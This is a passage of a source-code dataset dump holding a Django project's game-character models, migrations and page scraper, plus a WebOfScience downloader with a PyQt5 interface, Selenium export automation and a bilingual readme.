models.IntegerField(verbose_name='三界功绩', null=True, blank=True)\n\nclass Skill(models.Model):\n role_base = models.ForeignKey('RoleBase',on_delete=models.CASCADE)\n\n skill_type_choices = ((1,'师门技能'),(2,'生活技能'),(3,'剧情技能'),)\n skill_type = models.IntegerField(choices=skill_type_choices)\n\n from spider.setting import skill\n school_skill_choices = [(int(i),j['name']) for i,j in skill['school_skill'].items()]\n school_skill = models.IntegerField(choices=school_skill_choices,null=True, blank=True)\n\n life_skill_choices = [(int(i),j) for i,j in skill['life_skill'].items()]\n life_skill = models.IntegerField(choices=life_skill_choices,null=True, blank=True)\n\n ju_qing_skill_choices = [(int(i),j) for i,j in skill['ju_qing_skill'].items()]\n ju_qing_skill = models.IntegerField(choices=ju_qing_skill_choices,null=True, blank=True)\n\n skill_grade = models.IntegerField(null=True, blank=True)\n\nfrom spider.setting import equip_info\nequip_choices = [(int(i),j['name']) for i,j in equip_info.items()]\nclass Tool(models.Model):\n role_base = models.ForeignKey('RoleBase',on_delete=models.CASCADE)\n\n tool_type_choices = ((0,'装备灵饰'),(1,'装备'),(2,'未装备'),(3,'法宝'),(4,'未装备法宝'))\n tool_type = models.IntegerField(choices=tool_type_choices)\n\n lingshi = models.IntegerField(choices=equip_choices,null=True, blank=True)\n equip = models.IntegerField(choices=equip_choices,null=True, blank=True)\n no_equip = models.IntegerField(choices=equip_choices,null=True, blank=True)\n\n from spider.setting import fabao_info\n fabao_choices = [(int(i),j['name']) for i,j in fabao_info.items()]\n fabao = models.IntegerField(choices=fabao_choices,null=True, blank=True)\n no_fabao = models.IntegerField(choices=fabao_choices,null=True, blank=True)\n\n desc = models.TextField(null=True, blank=True)\n\nclass Pet(models.Model):\n role_base = models.ForeignKey('RoleBase',on_delete=models.CASCADE)\n\n from spider.setting import pet_info\n iType_choices = [(int(i),j) for i,j in pet_info.items()]\n iType = models.IntegerField(verbose_name='类型',choices=iType_choices,null=True,blank=True)\n\n iHp = models.IntegerField(verbose_name='气血',null=True,blank=True)\n iMp = models.IntegerField(verbose_name='魔法',null=True,blank=True)\n iAtt_all = models.IntegerField(verbose_name='攻击',null=True,blank=True)\n iDef_All = models.IntegerField(verbose_name='防御',null=True,blank=True)\n iDex_All = models.IntegerField(verbose_name='速度',null=True,blank=True)\n iMagDef_all = models.IntegerField(verbose_name='灵力',null=True,blank=True)\n life = models.IntegerField(verbose_name='寿命',null=True,blank=True)\n yuanxiao = models.IntegerField(verbose_name='已用元宵',null=True,blank=True)\n lianshou = models.IntegerField(verbose_name='已用炼兽珍经',null=True,blank=True)\n left_qlxl = models.IntegerField(verbose_name='已用清灵仙露',null=True,blank=True)\n iGrade = models.IntegerField(verbose_name='等级',null=True,blank=True)\n iCor_all = models.IntegerField(verbose_name='体质',null=True,blank=True)\n iMag_all = models.IntegerField(verbose_name='法力',null=True,blank=True)\n iStr_all = models.IntegerField(verbose_name='力量',null=True,blank=True)\n iRes_all = models.IntegerField(verbose_name='耐力',null=True,blank=True)\n iSpe_all = models.IntegerField(verbose_name='敏捷',null=True,blank=True)\n iPoint = models.IntegerField(verbose_name='潜能',null=True,blank=True)\n ruyidan = models.IntegerField(verbose_name='已用如意丹',null=True,blank=True)\n iBaobao = models.IntegerField(verbose_name='是否宝宝',null=True,blank=True)\n att = models.IntegerField(verbose_name='攻击资质',null=True,blank=True)\n def_zz = models.IntegerField(verbose_name='防御资质',null=True,blank=True)\n hp = models.IntegerField(verbose_name='体力资质',null=True,blank=True)\n mp = models.IntegerField(verbose_name='法力资质',null=True,blank=True)\n spe = models.IntegerField(verbose_name='速度资质',null=True,blank=True)\n dod = models.IntegerField(verbose_name='躲闪资质',null=True,blank=True)\n qianjinlu = models.IntegerField(verbose_name='已用千金露',null=True,blank=True)\n lx = models.IntegerField(verbose_name='灵性',null=True,blank=True)\n petSkills = models.CharField(verbose_name='所有技能',null=True,blank=True,max_length=64)\n\nclass PetSkill(models.Model):\n role_base = models.ForeignKey('Pet',on_delete=models.CASCADE)\n\n skill_type_choices = ((1,'认证技能'),(2,'技能'),)\n skill_type = models.IntegerField(choices=skill_type_choices)\n\n from spider.setting import PetSkillInfo\n pet_skill_choices = [(int(i),j) for i,j in PetSkillInfo.items()]\n pet_skill = models.IntegerField(choices=pet_skill_choices,null=True, blank=True)\n genius_skill = models.IntegerField(choices=pet_skill_choices,null=True, blank=True)\n\nclass PetEquip(models.Model):\n role_base = models.ForeignKey('Pet',on_delete=models.CASCADE)\n\n pet_equip = models.IntegerField(choices=equip_choices,null=True, blank=True)\n desc = models.TextField(null=True, blank=True)\n\nclass PetNeiDan(models.Model):\n role_base = models.ForeignKey('Pet',on_delete=models.CASCADE)\n\n from spider.setting import PetNeidanInfo\n pet_neidan_choices = [(int(i),j) for i,j in PetNeidanInfo.items()]\n pet_neidan = models.IntegerField(choices=pet_neidan_choices,null=True, blank=True)\n\n level = models.IntegerField(null=True, blank=True)\n\nclass Rider(models.Model):\n role_base = models.ForeignKey('RoleBase',on_delete=models.CASCADE)\n\n from spider.setting import rider_info\n rider_choices = [(int(i),j) for i,j in rider_info.items()]\n rider = models.IntegerField(choices=rider_choices,null=True, blank=True)\n\n grade = models.IntegerField(verbose_name='等级',null=True, blank=True)\n exgrow = models.FloatField(verbose_name='成长',null=True, blank=True)\n mattrib = models.CharField(verbose_name='属性',null=True, blank=True,max_length=16)\n\nclass RiderSkill(models.Model):\n role_base = models.ForeignKey('Rider',on_delete=models.CASCADE)\n\n itype = models.IntegerField(verbose_name='类型', null=True, blank=True)\n grade = models.IntegerField(verbose_name='等级', null=True, blank=True)\n\nclass XiangRui(models.Model):\n role_base = models.ForeignKey('RoleBase',on_delete=models.CASCADE)\n\n from spider.setting import xiangrui_info\n xiangrui_choices = [(int(i),j) for i,j in xiangrui_info.items()]\n xiangrui = models.IntegerField(choices=xiangrui_choices,null=True, blank=True)\n\n skill = models.CharField(verbose_name='技能',null=True, blank=True,max_length=16)\n\nclass clothes(models.Model):\n role_base = models.ForeignKey('RoleBase',on_delete=models.CASCADE)\n\n name = models.CharField(verbose_name='名字',null=True, blank=True,max_length=16)\n\n"
},
{
"alpha_fraction": 0.498834490776062,
"alphanum_fraction": 0.5268065333366394,
"avg_line_length": 30.77777862548828,
"blob_id": "b7706cb4a054fb0cfe8af148db44e690526c8a66",
"content_id": "c66214a6fbddacb94fc9d4f971b373dcaa00e82a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 878,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 27,
"path": "/dbmodels/migrations/0002_auto_20180917_1902.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-17 11:02\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ShowImg',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('img', models.ImageField(upload_to='')),\n ('img_type', models.IntegerField(choices=[(0, '轮播'), (1, '最热'), (2, '最新')])),\n ('stat', models.IntegerField(choices=[(0, '下架'), (1, '上架')])),\n ],\n ),\n migrations.AlterField(\n model_name='userinfo',\n name='header_img',\n field=models.ImageField(blank=True, null=True, upload_to=''),\n ),\n ]\n"
},
{
"alpha_fraction": 0.459070086479187,
"alphanum_fraction": 0.4629993438720703,
"avg_line_length": 28.960784912109375,
"blob_id": "bd3689eb92da1c5e48c0db7e7a246dcf54841661",
"content_id": "953e4762cec50ac8d541cc7ac5293dbc1ce1c761",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1527,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 51,
"path": "/spider/cbgspider.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "import json\nimport re\nimport requests\nfrom lxml import etree\n\nclass Spider:\n def __init__(self, url):\n self.url = url\n self.base_data = None\n self.json_data = None\n self.xml = None\n\n self.session = requests.session()\n self.html = self.get_html()\n self.get_base()\n self.get_json()\n\n def get_html(self):\n result = self.session.get(self.url)\n result = self.session.get(self.url)\n result.encoding = 'gbk'\n return result.text\n\n def _get_html_by_xml(self):\n if self.xml is None:\n self.xml = etree.HTML(self.html)\n return self.xml\n\n def get_json(self):\n html = self._get_html_by_xml()\n data = html.xpath(\".//textarea[@id='equip_desc_value']/text()\")[0]\n data = data.replace('([',\n '{').replace('])', '}').replace('({',\n '[').replace('})', ']').replace(',}',\n '}').replace(',]',']')\n\n def fun(s):\n old = s.groups()[0]\n return '\"' + old + '' + '\":'\n\n result = re.sub(r'(\\d+):', fun, data[1:-1])\n\n self.json_data = json.loads(result)\n\n def get_base(self):\n base_data = re.findall('<script>.*?var\\s*?equip\\s*?=\\s*?({.*?});',\n self.html, re.DOTALL)[0].replace('\\n\\t',\n '').replace('\\n', '').replace(\n 'safe_json_decode(\\'null\\')', '0')\n\n self.base_data = json.loads(base_data)"
},
{
"alpha_fraction": 0.6032540798187256,
"alphanum_fraction": 0.6282853484153748,
"avg_line_length": 29.730770111083984,
"blob_id": "dd20f6972d726688d1fe61f9bdd152da31892673",
"content_id": "8541f35ba0cc4137cbb0b926706b52331c9da759",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 799,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 26,
"path": "/dbmodels/migrations/0012_auto_20180918_1349.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-18 05:49\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0011_menu'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='transaction',\n name='user',\n field=models.ForeignKey(default=2, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='menu',\n name='parent_menu',\n field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='child', to='dbmodels.Menu'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5451174378395081,
"alphanum_fraction": 0.5834363698959351,
"avg_line_length": 26.89655113220215,
"blob_id": "4a0103b7574a9fe943c3d8bc36760fcd2d306947",
"content_id": "8f958a5a89fc3eb2c8e99ed0f52a842405957210",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 833,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 29,
"path": "/dbmodels/migrations/0006_auto_20180917_1952.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-17 11:52\n\nfrom django.db import migrations, models\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0005_auto_20180917_1940'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='showimg',\n options={'verbose_name': '首页展示图片', 'verbose_name_plural': '首页展示图片'},\n ),\n migrations.AddField(\n model_name='showimg',\n name='create_time',\n field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='showimg',\n name='top',\n field=models.BooleanField(default=False),\n ),\n ]\n"
}
] | 23 |
FlyHighest/WebOfScience-Downloader | https://github.com/FlyHighest/WebOfScience-Downloader | a21654545fab7da018277bb59013aac9fcdce0ae | b402c9a82f7f704622d3555114aec1eeb4f3e4b2 | 249595cb3da3ab191071b014cceafd7c1385fa85 | refs/heads/master | 2020-03-13T12:54:31.783433 | 2019-09-23T16:38:04 | 2019-09-23T16:38:04 | 131,128,564 | 7 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6909996867179871,
"alphanum_fraction": 0.7087364196777344,
"avg_line_length": 53.4471549987793,
"blob_id": "d5705b8264e52612c9d9e6f935c2e514187eb438",
"content_id": "ff56b3966618c9380a8de972b30004c32c254fe6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6892,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 123,
"path": "/ui_downloader.py",
"repo_name": "FlyHighest/WebOfScience-Downloader",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\r\n# Form implementation generated from reading ui file 'webdownloader.ui'\r\n#\r\n# Created by: PyQt5 UI code generator 5.10.1\r\n#\r\n# WARNING! All changes made in this file will be lost!\r\n\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\nclass Ui_MainWindow(object):\r\n def setupUi(self, MainWindow):\r\n MainWindow.setObjectName(\"MainWindow\")\r\n MainWindow.resize(515, 373)\r\n self.centralwidget = QtWidgets.QWidget(MainWindow)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.centralwidget)\r\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\r\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\r\n self.label = QtWidgets.QLabel(self.centralwidget)\r\n self.label.setObjectName(\"label\")\r\n self.horizontalLayout_3.addWidget(self.label)\r\n self.urlEdit = QtWidgets.QLineEdit(self.centralwidget)\r\n self.urlEdit.setObjectName(\"urlEdit\")\r\n self.horizontalLayout_3.addWidget(self.urlEdit)\r\n self.verticalLayout_2.addLayout(self.horizontalLayout_3)\r\n self.horizontalLayout = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\r\n self.horizontalLayout_6 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_6.setObjectName(\"horizontalLayout_6\")\r\n self.label_2 = QtWidgets.QLabel(self.centralwidget)\r\n self.label_2.setObjectName(\"label_2\")\r\n self.horizontalLayout_6.addWidget(self.label_2)\r\n self.intervalBox = QtWidgets.QSpinBox(self.centralwidget)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(self.intervalBox.sizePolicy().hasHeightForWidth())\r\n self.intervalBox.setSizePolicy(sizePolicy)\r\n self.intervalBox.setMinimum(1)\r\n self.intervalBox.setMaximum(100)\r\n self.intervalBox.setProperty(\"value\", 3)\r\n self.intervalBox.setObjectName(\"intervalBox\")\r\n self.horizontalLayout_6.addWidget(self.intervalBox)\r\n self.label_3 = QtWidgets.QLabel(self.centralwidget)\r\n self.label_3.setObjectName(\"label_3\")\r\n self.horizontalLayout_6.addWidget(self.label_3)\r\n self.horizontalLayout.addLayout(self.horizontalLayout_6)\r\n self.line = QtWidgets.QFrame(self.centralwidget)\r\n self.line.setFrameShape(QtWidgets.QFrame.VLine)\r\n self.line.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.line.setObjectName(\"line\")\r\n self.horizontalLayout.addWidget(self.line)\r\n self.verticalLayout = QtWidgets.QVBoxLayout()\r\n self.verticalLayout.setObjectName(\"verticalLayout\")\r\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\r\n self.allButton = QtWidgets.QRadioButton(self.centralwidget)\r\n self.allButton.setChecked(True)\r\n self.allButton.setObjectName(\"allButton\")\r\n self.horizontalLayout_2.addWidget(self.allButton)\r\n self.singleButton = QtWidgets.QRadioButton(self.centralwidget)\r\n self.singleButton.setObjectName(\"singleButton\")\r\n self.horizontalLayout_2.addWidget(self.singleButton)\r\n self.verticalLayout.addLayout(self.horizontalLayout_2)\r\n self.horizontalLayout_8 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_8.setObjectName(\"horizontalLayout_8\")\r\n self.label_4 = QtWidgets.QLabel(self.centralwidget)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(self.label_4.sizePolicy().hasHeightForWidth())\r\n self.label_4.setSizePolicy(sizePolicy)\r\n self.label_4.setMaximumSize(QtCore.QSize(100, 16777215))\r\n self.label_4.setObjectName(\"label_4\")\r\n self.horizontalLayout_8.addWidget(self.label_4)\r\n self.startEdit = QtWidgets.QLineEdit(self.centralwidget)\r\n self.startEdit.setEnabled(False)\r\n self.startEdit.setMaximumSize(QtCore.QSize(100, 16777215))\r\n self.startEdit.setObjectName(\"startEdit\")\r\n self.horizontalLayout_8.addWidget(self.startEdit)\r\n spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\r\n self.horizontalLayout_8.addItem(spacerItem)\r\n self.label_5 = QtWidgets.QLabel(self.centralwidget)\r\n self.label_5.setObjectName(\"label_5\")\r\n self.horizontalLayout_8.addWidget(self.label_5)\r\n self.totalEdit = QtWidgets.QLineEdit(self.centralwidget)\r\n self.totalEdit.setEnabled(False)\r\n self.totalEdit.setMaximumSize(QtCore.QSize(100, 16777215))\r\n self.totalEdit.setObjectName(\"totalEdit\")\r\n self.horizontalLayout_8.addWidget(self.totalEdit)\r\n self.verticalLayout.addLayout(self.horizontalLayout_8)\r\n self.horizontalLayout_7 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_7.setObjectName(\"horizontalLayout_7\")\r\n self.verticalLayout.addLayout(self.horizontalLayout_7)\r\n self.horizontalLayout.addLayout(self.verticalLayout)\r\n self.verticalLayout_2.addLayout(self.horizontalLayout)\r\n self.startButton = QtWidgets.QPushButton(self.centralwidget)\r\n self.startButton.setObjectName(\"startButton\")\r\n self.verticalLayout_2.addWidget(self.startButton)\r\n self.textBrowser = QtWidgets.QTextBrowser(self.centralwidget)\r\n self.textBrowser.setObjectName(\"textBrowser\")\r\n self.verticalLayout_2.addWidget(self.textBrowser)\r\n MainWindow.setCentralWidget(self.centralwidget)\r\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n MainWindow.setStatusBar(self.statusbar)\r\n\r\n self.retranslateUi(MainWindow)\r\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\r\n\r\n def retranslateUi(self, MainWindow):\r\n _translate = QtCore.QCoreApplication.translate\r\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"WebOfScience文件下载工具\"))\r\n self.label.setText(_translate(\"MainWindow\", \"下载地址\"))\r\n self.label_2.setText(_translate(\"MainWindow\", \"下载间隔\"))\r\n self.label_3.setText(_translate(\"MainWindow\", \"秒\"))\r\n self.allButton.setText(_translate(\"MainWindow\", \"全部下载\"))\r\n self.singleButton.setText(_translate(\"MainWindow\", \"单个文件\"))\r\n self.label_4.setText(_translate(\"MainWindow\", \"起始编号\"))\r\n self.label_5.setText(_translate(\"MainWindow\", \"下载数量\"))\r\n self.startButton.setText(_translate(\"MainWindow\", \"开始下载\"))\r\n\r\n"
},
{
"alpha_fraction": 0.7267441749572754,
"alphanum_fraction": 0.795265793800354,
"avg_line_length": 31.527027130126953,
"blob_id": "991aee21e8754265427c00a9f40b7335b7639e67",
"content_id": "baae312e524fd0afd7f000c4dac2bcec692646d2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3458,
"license_type": "permissive",
"max_line_length": 195,
"num_lines": 74,
"path": "/readme.md",
"repo_name": "FlyHighest/WebOfScience-Downloader",
"src_encoding": "UTF-8",
"text": "# WebOfScience-Downloader\n\nDownload files of search results from webofscience automatically. It is useful when you have thousands of papers to download\n\n# Packages\n\nThe following packages are used:\n\n PyQt5\n selenium\n \nIf you don't need a GUI, you may only need selenium to run downloader_func.py\n\nI use pyinstaller to generate two Exe files, you can use them on windows.\n\nI tested this program on win10/7(64bit) and win10(32bit)\n\nAlso, your computer should have Chrome installed and chrome web driver in system path.\n\nChrome version 66,chrome webdriver version2.3.7 are used during developing and testing.\n\n# Usage\n\n1. Install Chrome\n2. Install webdriver( notice the version should match with chrome version)\n3. Run the downloader\n\n\n\nFill 下载地址 with **a url that has search results displayed** like:\nhttp://apps.webofknowledge.com/Search.do?product=WOS&SID=\\*\\*\\*&search_mode=GeneralSearch&prID=\\*\\*\\*\n\n\n\n下载间隔: how many seconds the downloader waits after it starts to download a file. Try to increase this number if your network is not so good.\n\nPress “开始下载” to start download.\n\n# WebOfScience-下载器\n\n自动下载在webofscience上检索到的文章记录。\n\n# 运行环境\n使用到的包:\n\n PyQt5\n selenium\n \n如果你不需要界面的话,可以只使用downloader_func.py中的方法。\n\n我用pyinstaller打包好了两个exe,在64位win10/7和32位win10上测试过。\n\n下载器依赖于chrome浏览器和chromedriver。我在开发和测试时,使用的chrome版本是66,chromedriver版本是2.3.7。\n\n# 使用说明\n\n1. 安装Chrome。\n2. 安装对应版本的webdriver。\n3. 双击downloader.exe打开下载器。\n\n\n###### <center>下载器界面 </center>\n\n\n下载器的界面非常简单,下载地址填写**已经检索到论文结果**的网页地址。比如:\nhttp://apps.webofknowledge.com/Search.do?product=WOS&SID=\\*\\*\\*&search_mode=GeneralSearch&prID=\\*\\*\\*\n\n###### <center>需要的下载地址示例 </center>\n\n下载间隔,即文件下载后,隔几秒开始下一个文件下载,默认是3秒,可以根据网速调整,避免同时下载的文件太多,造成下载失败。\n\n右侧的选项“全部下载”,程序后自动获取检索结果网页中,记录总数,开始从1到最后,每500条记录一个文件进行下载。如果中间有网络错误,文件下载失败,或者其他特殊需求,可以选择“单个文件”,这时必须填写起始记录号和要下载的记录数量。下载数量不可以超过500。\n\n如果配置无误的话,点击“开始下载”之后会弹出一个chrome浏览器,程序开始自动进行操作。下载的文件保存在chrome的默认保存位置下,这个可以在浏览器的设置中配置。下载的文件会自动命名,一般为savedrecs (\\*).txt。在浏览器启动后,请**不要在网页中进行任何操作**,避免影响程序寻找需要点击的位置。另外,启动下载后,系统可能会提示是否允许下载器程序访问网络,点击允许即可。\n\n"
},
{
"alpha_fraction": 0.5942285060882568,
"alphanum_fraction": 0.6010993123054504,
"avg_line_length": 33.14482879638672,
"blob_id": "d596d169f4a6735f0b445610986bcac110021c16",
"content_id": "5a078951c64c4b6f1711bc9c8d625d652d64222c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5160,
"license_type": "permissive",
"max_line_length": 183,
"num_lines": 145,
"path": "/downloader.py",
"repo_name": "FlyHighest/WebOfScience-Downloader",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\nfrom PyQt5 import QtWidgets, QtGui,QtCore\r\nfrom PyQt5.QtWidgets import QApplication\r\nimport sys\r\nfrom ui_downloader import Ui_MainWindow # 导入生成form.py里生成的类\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport time\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\n\r\nclass DownloadThread(QtCore.QThread):\r\n trigger = QtCore.pyqtSignal(str)\r\n def __init__(self,url,interval=3,start=0,total=0,parent=None):\r\n super(DownloadThread, self).__init__(parent)\r\n self.url=url\r\n self.interval=interval\r\n self.start_n=start\r\n self.total=total\r\n \r\n def run(self):\r\n if int(self.start_n)==0:\r\n #all downloader\r\n self.startdownload(self.url,self.interval)\r\n else: \r\n #single downloader\r\n self.startdownload_single(self.url,int(self.start_n),int(self.total))\r\n \r\n def download_once(self,browser,start,end,first):\r\n\r\n #选中第5个下载选项\r\n try:\r\n elems = browser.find_element_by_id('exportMoreOptions') # Find the list button\r\n elems.click()\r\n except Exception as e:\r\n elems = browser.find_element_by_id('exportTypeName') # Find the list button\r\n elems.click()\r\n \r\n elem=browser.find_element_by_id('saveToMenu')\r\n elem=elem.find_element_by_css_selector('li:nth-child(3)')\r\n elem.click()\r\n \r\n\r\n elem=browser.find_element_by_id('numberOfRecordsRange')\r\n elem.click()\r\n\r\n markfrom=browser.find_element_by_id('markFrom')\r\n \r\n markfrom.clear()\r\n markfrom.send_keys(str(start))\r\n markto=browser.find_element_by_id('markTo')\r\n markto.clear()\r\n markto.send_keys(str(end))\r\n\r\n b=browser.find_element_by_id('select2-bib_fields-container')\r\n b.click()\r\n\r\n ul=browser.find_element_by_css_selector('ul.select2-results__options li:nth-child(3)')\r\n ul.click()\r\n\r\n b=browser.find_element_by_id('select2-saveOptions-container')\r\n b.click()\r\n\r\n ul=browser.find_element_by_css_selector('ul.select2-results__options li:nth-child(7)')\r\n ul.click()\r\n\r\n button=browser.find_element_by_id('exportButton')\r\n button.click()\r\n \r\n WebDriverWait(browser, 20, 0.5).until(EC.presence_of_element_located((By.CSS_SELECTOR,'form.quick-output-form div.quickoutput-overlay-buttonset a.quickoutput-cancel-action')))\r\n \r\n close_a=browser.find_element_by_css_selector('form.quick-output-form div.quickoutput-overlay-buttonset a.quickoutput-cancel-action')\r\n close_a.click()\r\n \r\n def startdownload(self,url,interval):\r\n browser = webdriver.Chrome()\r\n\r\n browser.get(url)\r\n\r\n totalEle=browser.find_element_by_id('trueFinalResultCount').get_attribute('innerHTML')\r\n first=True\r\n c=1\r\n for i in range(1,int(totalEle),500):\r\n if i+499<=int(totalEle):\r\n end=i+499\r\n \r\n else:\r\n end=int(totalEle)\r\n \r\n self.download_once(browser,i,end,first)\r\n first=False\r\n self.trigger.emit('正在下载第{:d}个文件: {:d} - {:d}'.format(c,i,end))\r\n\r\n c=c+1\r\n time.sleep(interval)\r\n\r\n\r\n def startdownload_single(self,url,start,total):\r\n browser = webdriver.Chrome()\r\n browser.get(url)\r\n\r\n self.download_once(browser,start,start+total-1,True)\r\n\r\n self.trigger.emit('正在下载第{:d}个文件: {:d} - {:d}'.format(1,start,start+total-1))\r\n \r\nclass Downloader(QtWidgets.QMainWindow,Ui_MainWindow): \r\n def __init__(self): \r\n super().__init__() \r\n self.setupUi(self)\r\n self.allButton.setChecked(True)\r\n self.allButton.clicked.connect(self.allbuttonclick)\r\n self.singleButton.clicked.connect(self.singlebuttonclick)\r\n self.startButton.clicked.connect(self.startdownload)\r\n \r\n def startdownload(self):\r\n if self.allButton.isChecked():\r\n url=self.urlEdit.text()\r\n interval=self.intervalBox.value()\r\n th=DownloadThread(url,interval,parent=self)\r\n th.trigger.connect(self.update_message)\r\n th.start()\r\n else:\r\n url=self.urlEdit.text()\r\n start=self.startEdit.text()\r\n total=self.totalEdit.text()\r\n th=DownloadThread(url,0,start,total,parent=self)\r\n th.trigger.connect(self.update_message)\r\n th.start()\r\n \r\n def allbuttonclick(self):\r\n self.startEdit.setEnabled(False)\r\n self.totalEdit.setEnabled(False)\r\n \r\n def singlebuttonclick(self):\r\n self.startEdit.setEnabled(True)\r\n self.totalEdit.setEnabled(True)\r\n \r\n def update_message(self,msg):\r\n self.textBrowser.append(msg)\r\n \r\napp = QApplication([])\r\nex = Downloader()\r\nex.show()\r\nsys.exit(app.exec_())"
},
{
"alpha_fraction": 0.6469780206680298,
"alphanum_fraction": 0.6589972376823425,
"avg_line_length": 33.072288513183594,
"blob_id": "8ed49d18192bc0f8a02eedf5cbefb756872fbd18",
"content_id": "ac7692f14ed4cf43c5fe00bba685537c12bcd6dc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2992,
"license_type": "permissive",
"max_line_length": 179,
"num_lines": 83,
"path": "/downloader_func.py",
"repo_name": "FlyHighest/WebOfScience-Downloader",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport time\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\n\r\ndef download_once(browser,start,end,first):\r\n\r\n\r\n #选中第5个下载选项\r\n if(first==True):\r\n elems = browser.find_elements_by_css_selector('span.select2-selection__arrow') # Find the search box\r\n elems[1].click()\r\n elem=browser.find_element_by_css_selector('ul.select2-results__options li:nth-child(5)')\r\n elem.click()\r\n else:\r\n elem=browser.find_element_by_id('select2-saveToMenu-container')\r\n elem.click()\r\n\r\n\r\n elem=browser.find_element_by_id('numberOfRecordsRange')\r\n elem.click()\r\n\r\n markfrom=browser.find_element_by_id('markFrom')\r\n markfrom.send_keys(str(start))\r\n markto=browser.find_element_by_id('markTo')\r\n markto.send_keys(str(end))\r\n\r\n b=browser.find_element_by_id('select2-bib_fields-container')\r\n b.click()\r\n\r\n ul=browser.find_element_by_css_selector('ul.select2-results__options li:nth-child(3)')\r\n ul.click()\r\n\r\n b=browser.find_element_by_id('select2-saveOptions-container')\r\n b.click()\r\n\r\n ul=browser.find_element_by_css_selector('ul.select2-results__options li:nth-child(8)')\r\n ul.click()\r\n\r\n button=browser.find_element_by_css_selector('div.quickoutput-overlay-buttonset span.quickoutput-action button.primary-button')\r\n button.click()\r\n \r\n WebDriverWait(browser, 20, 0.5).until(EC.presence_of_element_located((By.CSS_SELECTOR,'form.quick-output-form div.quickoutput-overlay-buttonset a.quickoutput-cancel-action')))\r\n \r\n close_a=browser.find_element_by_css_selector('form.quick-output-form div.quickoutput-overlay-buttonset a.quickoutput-cancel-action')\r\n close_a.click()\r\n \r\ndef startdownload(downloader,url,interval):\r\n browser = 